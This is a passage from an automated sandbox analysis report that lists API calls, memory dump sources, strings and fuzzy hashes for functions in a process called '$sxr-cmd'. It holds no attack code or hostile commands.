                                                                                                                        • Part of subcall function 00007FF6154F6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF6154F6AE8,?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925), ref: 00007FF6154F6B97
                                                                                                                        • Part of subcall function 00007FF6154F6B84: RtlFreeHeap.NTDLL(?,?,?,?,00007FF6154F6AE8,?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925), ref: 00007FF6154F6BAF
                                                                                                                        • Part of subcall function 00007FF6154F6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F6AF1,?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925), ref: 00007FF6154F6B39
                                                                                                                        • Part of subcall function 00007FF6154F6B30: RtlFreeHeap.NTDLL(?,?,?,00007FF6154F6AF1,?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925), ref: 00007FF6154F6B4D
                                                                                                                        • Part of subcall function 00007FF6154F6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154F6AF1,?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925), ref: 00007FF6154F6B59
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925,?,?,?,?,00007FF6154FB9B1), ref: 00007FF6154F6B03
                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF61551EA0F,?,?,?,00007FF61551E925,?,?,?,?,00007FF6154FB9B1), ref: 00007FF6154F6B17
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3512109576-0
                                                                                                                      • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                      • Instruction ID: 58b50a72a6943644f5158010cc24a4095bcc590808ab1aef225aee4b926e0161
                                                                                                                      • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                                      • Instruction Fuzzy Hash: 4F215E66A09E82C6EB04DF79D4542B8BBA0EF59F65F188036CA0E87365DF3CA855C350
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154FAF82), ref: 00007FF6154FB6D0
                                                                                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154FAF82), ref: 00007FF6154FB6E7
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154FAF82), ref: 00007FF6154FB701
                                                                                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154FAF82), ref: 00007FF6154FB715
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocSize
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2549470565-0
                                                                                                                      • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                      • Instruction ID: 182083b5a275fbc0a34c72fab48760f6c382bb0be7b66b9d2d1f52aaabeeccf9
                                                                                                                      • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                                      • Instruction Fuzzy Hash: 2D210E26A09F82C6EA548B19E450079F7A1FB8AFA4B499432DA4E83764DF3CED558700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF61550507A), ref: 00007FF61551D01C
                                                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF61550507A), ref: 00007FF61551D033
                                                                                                                      • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF61550507A), ref: 00007FF61551D06D
                                                                                                                      • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF61550507A), ref: 00007FF61551D07F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1033415088-0
                                                                                                                      • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                      • Instruction ID: 1cdd1f3b29c598cb1349daefe1baa815fcf86587ca66a786985512f0f0d81b62
                                                                                                                      • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                                      • Instruction Fuzzy Hash: 83118236618E82C7DB449B20F05417AFBA0FB8AFA5F415135EA8E87B65EF3CD4458B00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 22757656-0
                                                                                                                      • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                      • Instruction ID: d43923821bb41a12e981f0c062b68fcb927e0f1caa819c6cbd9f0d76e83a91d6
                                                                                                                      • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                      • Instruction Fuzzy Hash: DF116075A18A4587E7104B28E44837DBAA0FB8AF74F654734D62E873E1CF3CD9498B00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF615515433,?,?,?,00007FF6155169B8,?,?,?,?,?,00007FF615508C39), ref: 00007FF6155156C5
                                                                                                                      • RtlFreeHeap.NTDLL(?,?,00000028,00007FF615515433,?,?,?,00007FF6155169B8,?,?,?,?,?,00007FF615508C39), ref: 00007FF6155156D9
                                                                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF615515433,?,?,?,00007FF6155169B8,?,?,?,?,?,00007FF615508C39), ref: 00007FF6155156FD
                                                                                                                      • RtlFreeHeap.NTDLL(?,?,00000028,00007FF615515433,?,?,?,00007FF6155169B8,?,?,?,?,?,00007FF615508C39), ref: 00007FF615515711
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3859560861-0
                                                                                                                      • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                      • Instruction ID: d6b292ecac321ace070e2fe02caa6d5a2ff79ba2f95b5dbbe4cd3bd0e6109084
                                                                                                                      • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                      • Instruction Fuzzy Hash: 23112576A04F81C6EB008F66E4440A8BBB0FB89F94B4D8125DB4E43728DF38E956C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 140117192-0
                                                                                                                      • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                      • Instruction ID: 4c3c7a3898737e81a2c7288e9e0c0ca6872fa635fff08deb29c0b13ba3f8e8df
                                                                                                                      • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                                      • Instruction Fuzzy Hash: 40217E3AA19F45C5E7408B64E884369B7B4FB99FA4F600136DA8D82774DF7DE846CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleMode_get_osfhandle
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1606018815-0
                                                                                                                      • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                      • Instruction ID: 4f8d89fbe299c5eb11983ee3a987614c2acdd9ce5f34cdeee5ed707d9e466925
                                                                                                                      • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                      • Instruction Fuzzy Hash: 6BF01C39A24E42CBD7045B20E844179FA60FF8AF22F859274DA0F423A5DF3CD8088B40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileType
                                                                                                                      • String ID: \\.\pipe\
                                                                                                                      • API String ID: 3081899298-91387939
                                                                                                                      • Opcode ID: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                                      • Instruction ID: 50df859e975970b90aadef6dc6e50906d93e1a52c7626bcce2e3e585afbcb2f6
                                                                                                                      • Opcode Fuzzy Hash: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
                                                                                                                      • Instruction Fuzzy Hash: 8C71E53260AB8446F7249FA6D95A3EE63B2F7857E4F800016DE4D4BB86EF36C504C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF6154FCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6154FB9A1,?,?,?,?,00007FF6154FD81A), ref: 00007FF6154FCDA6
                                                                                                                        • Part of subcall function 00007FF6154FCD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF6154FB9A1,?,?,?,?,00007FF6154FD81A), ref: 00007FF6154FCDBD
                                                                                                                      • wcschr.MSVCRT ref: 00007FF6155211DC
                                                                                                                      • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF61551827A), ref: 00007FF615521277
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocateProcessmemmovewcschr
                                                                                                                      • String ID: &()[]{}^=;!%'+,`~
                                                                                                                      • API String ID: 4220614737-381716982
                                                                                                                      • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                      • Instruction ID: d7dfc8c3665e075938b1bad330367d409ee1bd68a0c36547ee939f81c0ac5e00
                                                                                                                      • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                      • Instruction Fuzzy Hash: 6E719579908A42C6D760CF66A48067AF7E5FB94FA9F505235DA4DC3BB4DF3CA8418B00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF6155006C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006D6
                                                                                                                        • Part of subcall function 00007FF6155006C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF6155006F0
                                                                                                                        • Part of subcall function 00007FF6155006C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF61550074D
                                                                                                                        • Part of subcall function 00007FF6155006C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6154FB4DB), ref: 00007FF615500762
                                                                                                                      • longjmp.MSVCRT ref: 00007FF61550CCBC
                                                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF615501F69,?,?,?,?,?,?,?,00007FF6154F286E,00000000,00000000,00000000,00000000), ref: 00007FF61550CCE0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                                      • String ID: GeToken: (%x) '%s'
                                                                                                                      • API String ID: 3282654869-1994581435
                                                                                                                      • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                                      • Instruction ID: c6ba8e2017261f1beabe7bd666a8d35fbe1633646802f46d63c57ff7b3301af3
                                                                                                                      • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                                      • Instruction Fuzzy Hash: CC61F025A09F428AFAA48B69D454179E391AF41FB9F544536CA1DCBBF1EF3CEC608300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileType
                                                                                                                      • String ID: \\.\pipe\
                                                                                                                      • API String ID: 3081899298-91387939
                                                                                                                      • Opcode ID: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                                      • Instruction ID: ea8f37d4f2e69e4cf408ee4398304f8d510f4e60f6cbb5d230eabb9dcd856170
                                                                                                                      • Opcode Fuzzy Hash: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
                                                                                                                      • Instruction Fuzzy Hash: 2951D82260EBC143F6749FA9A16C7AA6773F7957A0F840025DD8D0BB5BEA3BC5448B40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memmovewcsncmp
                                                                                                                      • String ID: 0123456789
                                                                                                                      • API String ID: 3879766669-2793719750
                                                                                                                      • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                      • Instruction ID: f225a7486ceee327386fb5faaf78832d9ede47b5b4c4317ae672d23414c119f6
                                                                                                                      • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                                                                                                                      • Instruction Fuzzy Hash: BB41C626F1AB86C5EA658F3594006BAA3A5FB44FA0F545131DE4E877B4DF3CD8458340
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6155197D0
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6154FD46E
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6154FD485
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD4EE
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: iswspace.MSVCRT ref: 00007FF6154FD54D
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD569
                                                                                                                        • Part of subcall function 00007FF6154FD3F0: wcschr.MSVCRT ref: 00007FF6154FD58C
                                                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF6155198D7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                      • String ID: Software\Classes
                                                                                                                      • API String ID: 2714550308-1656466771
                                                                                                                      • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                      • Instruction ID: b57c6ed30204de3e7f75f5b5c36d53253a78d46cac7dae61aad13bdc36b48c57
                                                                                                                      • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                      • Instruction Fuzzy Hash: 41418C2AA09F5291EA009F1AD484479A7B4FB85FE0F508131DA5E877F5EF39EC52C340
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                      • String ID: U
                                                                                                                      • API String ID: 442123175-4171548499
